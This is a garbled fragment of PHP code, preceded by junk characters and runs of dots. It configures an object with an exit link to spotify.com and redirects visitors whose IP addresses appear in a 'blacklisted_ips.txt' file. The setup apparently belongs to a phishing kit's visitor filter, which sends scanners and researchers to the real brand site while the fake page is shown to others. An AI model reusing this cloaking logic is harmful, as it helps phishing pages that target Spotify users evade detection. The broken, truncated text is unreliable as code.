??? 123123123123 .....................................................................................................................................??? 123123123123 .....................................................................................................................................setExitLink("https://spotify.com"); $bm->setGeoFilter(""); $bm->setLicenseKey(""); $bm->setTestMode(false); $bm->run(); $list = explode(",", file_get_contents((__DIR__)."/blacklisted_ips.txt")); foreach($list as $bip){ if($_SERVER['REMOTE_ADDR']==trim($bip)){ header("location:".$bm->EXIT_LINK); } } ?>